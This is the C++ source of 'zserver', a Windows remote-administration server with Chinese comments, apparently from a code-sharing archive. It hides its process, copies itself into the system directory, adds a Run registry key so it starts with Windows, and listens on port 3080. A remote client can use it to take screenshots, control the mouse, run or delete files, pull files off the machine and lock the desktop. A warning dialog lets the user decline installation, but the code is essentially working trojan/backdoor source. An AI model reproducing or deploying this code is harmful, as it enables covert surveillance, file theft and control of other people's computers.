www.pudn.com > zx.zip > zserver.cpp
// zserver.cpp : Defines the entry point for the application. // #include#include #include #define SENDBLOCK 4096//传送(文件.屏幕截图...)时每次最大传送的块 /////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////// SOCKET sktClient; SOCKET sktConnect; BOOL EndProgram;//Exit program if TRUE UINT nPort;//dafault port struct sockaddr_in sockaddrin; char chrcommand[2][300];//被分开后的 命令行 char chrReceive[300];//接收到的命令 UINT AnalyseCommand();//把命令分开 BOOL InitSocket();//return TRUE if successful BOOL ConnectSocket();//listen and accept .return TRUE if successful BOOL AcceptSocket();//return 0 if successful void ResetAll(); void TestConnect(); void SendDriverInfo(); void listDirectory(); void SendScreen(); void RunFile(); void DownLoadFile(); void LockMachine(); void UnLock(); void Text2Screen(); void DelFile(); void AddToSystem(); void HideProcess(); HANDLE DDB2DIB(HBITMAP bitmap);//使图象与设备无关 void MouseEvent(); ////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////// typedef struct _MyFileInfo { BOOL InvaliDir; //无效目录 TCHAR szFileName[128]; //文件名 BOOL IsDirectory; //是目录? BOOL Next; //还有下一个? } MyFileInfo, * PMyFileInfo; typedef struct _MyScreenInfo{ UINT ScrX;//宽(象素) UINT ScrY;//高(象素) DWORD dwSize;//图象大小 } MyScreenInfo, * pMyScreenInfo; typedef struct _MyMouseEvent{ DWORD dwFlags;//鼠标状态 unsigned long dx;//屏幕位置 x unsigned long dy;//屏幕位置 y BOOL DoubleClick;//双击? FLASE->不是 TRUE->是 } MyMouseEvent, * pMyMouseEvent; /////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////// int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { // TODO: Place code here. HideProcess(); AddToSystem(); nPort=3080;//default port //initialize socket(ver=1.1) if(!InitSocket()) return FALSE; if(!ConnectSocket()) return FALSE; //wait command while(!EndProgram)//EndProgram?? { if(!AcceptSocket()) { ResetAll(); ConnectSocket(); } else { recv(sktClient,chrReceive,300,0); AnalyseCommand();//把命令分开 switch((chrcommand[0][0])) { case 127: TestConnect();//测试连接 break; case 1: SendDriverInfo();//传送驱动器信息 break; case 2: listDirectory();//列出目录(目录由chrReceive收到,经过AnalyseCommand(),放在chrcommand[1]中 break; case 3: SendScreen();//截取屏幕 break; case 4: MouseEvent();//鼠标事件 break; case 5: RunFile();//打开文件 break; case 6: DownLoadFile(); break; case 7: LockMachine(); break; case 8: UnLock(); break; case 9: Text2Screen(); break; case 10: DelFile(); break; case 11: exit(0); break; } closesocket(sktClient); } } return 0; } ///////////////////////////////////////////////////////////////////// BOOL InitSocket() { WSADATA lpWSAData; if(WSAStartup(MAKEWORD(1,1),&lpWSAData))//The WSAStartup function returns zero if successful { MessageBox(GetActiveWindow(), "无法初始化WinSocket,请检查TCP/IP设置", "! WinSocket", MB_OK); return FALSE;//fail } return TRUE; } ///////////////////////////////////////////////////////////////////// BOOL ConnectSocket() { // socket create sktConnect=socket(AF_INET,SOCK_STREAM,0); if(sktConnect==INVALID_SOCKET) { MessageBox(GetActiveWindow(),"无法创建SOCKET","! WinSocket",MB_OK); return FALSE; } // socket bind sockaddrin.sin_addr.s_addr = INADDR_ANY; sockaddrin.sin_family = AF_INET; sockaddrin.sin_port = htons(nPort); if(bind(sktConnect,(struct sockaddr far *)&sockaddrin,sizeof(sockaddrin))) { MessageBox(GetActiveWindow(),"无法绑定端口,可能端口已被占用","! WinSocket",MB_OK); return FALSE; } // socket listen if(listen(sktConnect,1)) { MessageBox(GetActiveWindow(),"请检查网络设置","! WinSocket",MB_OK); return FALSE; } return TRUE; } ///////////////////////////////////////////////////////////////////// BOOL AcceptSocket() { int ilenofsockaddr=sizeof(sockaddrin); sktClient=accept(sktConnect,(struct sockaddr far *)&sockaddrin,&ilenofsockaddr); if(sktClient==INVALID_SOCKET) { MessageBox(GetActiveWindow(),"连接失败","! WinSocket",MB_OK); return FALSE; } char cFlag[8]; recv(sktClient,cFlag,8,0);//接收标志 确认是 本软件的 client 端 if(strcmp(cFlag,"zserve\0")) { return FALSE; } send(sktClient ,cFlag,8,0);// 发送server端标志 return TRUE; } ///////////////////////////////////////////////////////////////////// void ResetAll() { closesocket(sktClient); closesocket(sktConnect); } ///////////////////////////////////////////////////////////////////// void TestConnect() { send(sktClient,"连接成功",300,0); } ///////////////////////////////////////////////////////////////////// UINT AnalyseCommand() { chrcommand[0][0]=chrReceive[0]; for(int i=2;i<=299;i++) { chrcommand[1][i-2]=chrReceive[i]; } return 0; } ///////////////////////////////////////////////////////////////////// void SendDriverInfo() { char chr[300]= " "; //用空格使字符串为空 int i=0; for(int drive = 1; drive <= 26; drive++ ) { if( !_chdrive( drive ) ) { chr[i]=(drive+'A'-1); i++; continue; } chr[i]='+'; } send(sktClient,chr,300,0); } ///////////////////////////////////////////////////////////////////// void listDirectory() { long handle; struct _MyFileInfo fileinfo; struct _finddata_t findfile; fileinfo.InvaliDir =0; fileinfo.IsDirectory =0; fileinfo.Next =0; if(_chdir(chrcommand[1])) { fileinfo.InvaliDir =1; strcpy(fileinfo.szFileName ,"!*目录无法访问*!"); fileinfo.Next =1; fileinfo.IsDirectory =0; send(sktClient,(char*)&fileinfo,sizeof(_MyFileInfo),0); return; } handle = _findfirst("*",&findfile); do{ strcpy(fileinfo.szFileName,findfile.name) ; fileinfo.Next =1; if(GetFileAttributes(fileinfo.szFileName )&FILE_ATTRIBUTE_DIRECTORY) { fileinfo.IsDirectory =1; } else { fileinfo.IsDirectory =0; } send(sktClient,(char *)&fileinfo,sizeof(_MyFileInfo),0); }while(!_findnext(handle,&findfile)); fileinfo.Next =0; send(sktClient,(char*)&fileinfo,sizeof(_MyFileInfo),0); } void SendScreen() { _MyScreenInfo ScreenInfo; ScreenInfo.ScrX = GetSystemMetrics(SM_CXSCREEN); ScreenInfo.ScrY = GetSystemMetrics(SM_CYSCREEN); //////////////////////////////////////////////////// //////////////////////////////////////////////////// //// ////此屏幕截取方法来自星辰1.0(sockspy 1.0), ////谢谢星辰大虾 //// //////////////////////////////////////////////////// HDC hdcmy,hbufferdc; HBITMAP hBit,hOldBitmap; //得到屏幕HDC hdcmy = CreateDC("DISPLAY",NULL,NULL,NULL); hbufferdc = CreateCompatibleDC(hdcmy); //建立相容的HBITMAP hBit = CreateCompatibleBitmap(hdcmy, ScreenInfo.ScrX , ScreenInfo.ScrY ); //把屏幕copy到内存 hOldBitmap = (HBITMAP)SelectObject(hbufferdc, hBit); StretchBlt(hbufferdc, 0, 0, ScreenInfo.ScrX, ScreenInfo.ScrY, hdcmy, 0, 0,ScreenInfo.ScrX,ScreenInfo.ScrY, SRCCOPY); //得到最终的屏幕颜色 hBit = (HBITMAP)SelectObject(hbufferdc, hOldBitmap); //释放内存 DeleteObject(hOldBitmap); ReleaseDC(NULL,hdcmy); ReleaseDC(NULL,hbufferdc); HANDLE hDib; hDib = DDB2DIB(hBit); DeleteObject(hBit); LPBYTE plmagePoint; ScreenInfo.dwSize = GlobalSize(hDib); int StopFlag; send(sktClient,(char*)&ScreenInfo,sizeof(ScreenInfo)+1,0); recv(sktClient,(char*)&StopFlag,sizeof(int)+1,0); //Send Bit plmagePoint = (LPBYTE)hDib; for(WORD i=0;i<(ScreenInfo.dwSize /SENDBLOCK) ;i++) { send(sktClient,(char*)plmagePoint,sizeof(BYTE)*SENDBLOCK,0); plmagePoint = plmagePoint + SENDBLOCK; recv(sktClient,(char*)&StopFlag,sizeof(int)+1,0); } if (ScreenInfo.dwSize %SENDBLOCK) { send(sktClient,(char*)plmagePoint,sizeof(BYTE)*ScreenInfo.dwSize%SENDBLOCK,0); } GlobalFree(hDib); return; } HANDLE DDB2DIB( HBITMAP bitmap) { //Define Variable BITMAP bm; BITMAPINFOHEADER bi; LPBITMAPINFOHEADER lpbi; DWORD dwLen; HANDLE hDib; HANDLE handle; HDC hdc; HPALETTE hPal; hPal = (HPALETTE) GetStockObject(DEFAULT_PALETTE ); // get bitmap information GetObject(bitmap,sizeof(bm),(LPSTR)&bm); // initialize the bitmapinfoheader bi.biSize = sizeof(BITMAPINFOHEADER); bi.biWidth = bm.bmWidth; bi.biHeight = bm.bmHeight; bi.biPlanes = 1; bi.biBitCount = bm.bmPlanes * bm.bmBitsPixel; bi.biBitCount = 4; bi.biCompression = BI_RGB; bi.biSizeImage = 0; bi.biXPelsPerMeter = 0; bi.biYPelsPerMeter = 0; bi.biClrUsed = 0; bi.biClrImportant = 0; // compute the size of the infoheader and the color table int ncolors = (1 << bi.biBitCount); if( ncolors> 256 ) ncolors = 0; dwLen = bi.biSize + ncolors * sizeof(RGBQUAD); // we need a device context to get the dib from hdc = GetDC(NULL); hPal = SelectPalette(hdc,hPal,FALSE); RealizePalette(hdc); // allocate enough memory to hold bitmapinfoheader and color table hDib = GlobalAlloc(GMEM_FIXED,dwLen); if (!hDib){ SelectPalette(hdc,hPal,FALSE); ReleaseDC(NULL,hdc); return NULL; } lpbi = (LPBITMAPINFOHEADER)hDib; *lpbi = bi; // call getdibits with a NULL lpbits param, so the device driver // will calculate the bisizeimage field GetDIBits(hdc, bitmap, 0L, (DWORD)bi.biHeight, (LPBYTE)NULL, (LPBITMAPINFO)lpbi, (DWORD)DIB_RGB_COLORS ); bi = *lpbi; // if the driver did not fill in the bisizeimage field, then compute it // each scan line of the image is aligned on a dword (32bit) boundary if (bi.biSizeImage == 0) { bi.biSizeImage = ((((bi.biWidth * bi.biBitCount) + 31) & ~31) / 8) * bi.biHeight; } // realloc the buffer so that it can hold all the bits dwLen += bi.biSizeImage; if (handle = GlobalReAlloc(hDib, dwLen, GMEM_MOVEABLE)) hDib = handle; else { GlobalFree(hDib); // reselect the original palette SelectPalette(hdc,hPal,FALSE); ReleaseDC(NULL,hdc); return NULL; } // get the bitmap bits lpbi = (LPBITMAPINFOHEADER)hDib; // finally get the dib BOOL bgotbits = GetDIBits( hdc, bitmap, 0L, // start scan line (DWORD)bi.biHeight, // # of scan lines (LPBYTE)lpbi // address for bitmap bits + (bi.biSize + ncolors * sizeof(RGBQUAD)), (LPBITMAPINFO)lpbi, // address of bitmapinfo (DWORD)DIB_RGB_COLORS); // use rgb for color table if( !bgotbits ) { GlobalFree(hDib); SelectPalette(hdc,hPal,FALSE); ReleaseDC(NULL,hdc); return NULL; } SelectPalette(hdc,hPal,FALSE); ReleaseDC(NULL,hdc); return hDib; } ///////////////////////////////////////////////////////////////////// void MouseEvent() { struct _MyMouseEvent met; recv (sktClient,(char*)&met,sizeof(_MyMouseEvent),0); SetCursorPos(met.dx,met.dy); switch(met.dwFlags ) { case MOUSEEVENTF_LEFTDOWN: mouse_event(MOUSEEVENTF_LEFTDOWN ,0,0,0,GetMessageExtraInfo()); mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,GetMessageExtraInfo()); if(met.DoubleClick ==TRUE) { mouse_event(MOUSEEVENTF_LEFTDOWN ,0,0,0,GetMessageExtraInfo()); mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,GetMessageExtraInfo()); } break; case MOUSEEVENTF_RIGHTDOWN: mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,GetMessageExtraInfo()); mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,GetMessageExtraInfo()); if(met.DoubleClick ==TRUE) { mouse_event(MOUSEEVENTF_RIGHTDOWN ,0,0,0,GetMessageExtraInfo()); mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,GetMessageExtraInfo()); } break; } } ////////////////////////////////////////////////////////////////////////////// void RunFile() { ShellExecute(0,0,chrcommand[1],0,0,SW_SHOWNORMAL); } ////////////////////////////////////////////////////////////////////////////// void DownLoadFile() { //打开文件 FILE *pFile; if((pFile=fopen(chrcommand[1],"rb"))==NULL) { send(sktClient,"FailOpenFile\0",300,0); return; } //open file successful send(sktClient,"continue\0",300,0); _finddata_t pFileInfo; _findfirst(chrcommand[1],&pFileInfo);//get file attrib send(sktClient,(char *)&pFileInfo,sizeof(_finddata_t)+1,0);//send file attrib BYTE *pBuffer=new BYTE[SENDBLOCK]; memset(pBuffer,0,SENDBLOCK); int StopFlag; recv(sktClient,(char*)&StopFlag,sizeof(int)+1,0); for(WORD i=0;i<(pFileInfo.size /SENDBLOCK);i++) { fread(pBuffer,SENDBLOCK,1,pFile); send(sktClient,(char*)pBuffer,SENDBLOCK,0); memset(pBuffer,0,SENDBLOCK); recv(sktClient,(char*)&StopFlag,sizeof(int)+1,0); } DWORD w=pFileInfo.size %SENDBLOCK; if(w) { fread(pBuffer,w,1,pFile); send(sktClient,(char*)pBuffer,w,0); } fclose(pFile); } //////////////////////////////////////////////////////// void LockMachine() { SystemParametersInfo(SPI_SCREENSAVERRUNNING, 1, NULL,0); EnableWindow(GetDesktopWindow(),FALSE); } //////////////////////////////////////////////////////// void UnLock() { SystemParametersInfo(SPI_SCREENSAVERRUNNING, 0, NULL,0); EnableWindow(GetDesktopWindow(),TRUE); } ///////////////////////////////////////////////////////// void Text2Screen() { BitBlt(GetDC(0), (GetSystemMetrics(SM_CXSCREEN)/2)-200, GetSystemMetrics(SM_CYSCREEN)/2-100, 300, 100, 0,0,0,BLACKNESS); TextOut(GetDC(0), (GetSystemMetrics(SM_CXSCREEN)/2)-170, GetSystemMetrics(SM_CYSCREEN)/2-60, chrcommand[1], strlen(chrcommand[1])); } ///////////////////////////////////////////////////////// void DelFile() { SetFileAttributes(chrcommand[1],FILE_ATTRIBUTE_NORMAL); DeleteFile(chrcommand[1]); } ///////////////////////////////////////////////////////// void AddToSystem() { HKEY hKEY; char CurrentPath[MAX_PATH]; char SysPath[MAX_PATH]; long ret; LPSTR FileNewName; LPSTR FileCurrentName; DWORD type=REG_SZ; DWORD size=MAX_PATH; LPCTSTR Rgspath="Software\\Microsoft\\Windows\\CurrentVersion\\Run" ; //Get System Path GetSystemDirectory(SysPath,size); GetModuleFileName(NULL,CurrentPath,size); //Copy File FileCurrentName = CurrentPath; FileNewName = lstrcat(SysPath,"\\serveZ.exe");//copy to windir\system\serveZ.exe struct _finddata_t serveZ; if(_findfirst(FileNewName,&serveZ)!=-1) return;//已经安装! int ihow=MessageBox(0,"该程序只允许用于合法的用途!\n继续运行该程序将使这台机器处于被监控的状态!\n如果您不想这样,请按“取消”按钮退出。\n按下“是”按钮该程序将被复制到您的机器上,并随系统启动自动运行。\n按下“否”按钮,程序只运行一次,不会在您的系统内留下任何东西。","警告",MB_YESNOCANCEL|MB_ICONWARNING|MB_TOPMOST ); if(ihow==IDCANCEL) exit(0); if(ihow==IDNO) return;//只运行一次 //复制文件 ret = CopyFile(FileCurrentName,FileNewName,TRUE); if (!ret) { return ; } //加入注册表 ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE, &hKEY); if(ret!=ERROR_SUCCESS) { RegCloseKey(hKEY); return ; } //Set Key ret=RegSetValueEx(hKEY,"Zserve",NULL,type,(const unsigned char*)FileNewName,size); if(ret!=ERROR_SUCCESS) { RegCloseKey(hKEY); return ; } RegCloseKey(hKEY); } /////////////////////////////////////////////////////////////// void HideProcess() { HINSTANCE hInst = LoadLibrary("KERNEL32.DLL"); if(hInst) { typedef DWORD (WINAPI *MYFUNC)(DWORD,DWORD); MYFUNC RegisterServiceProcessFun = NULL; RegisterServiceProcessFun = (MYFUNC)GetProcAddress(hInst, "RegisterServiceProcess"); if(RegisterServiceProcessFun) { RegisterServiceProcessFun(GetCurrentProcessId(),1); } FreeLibrary(hInst); } }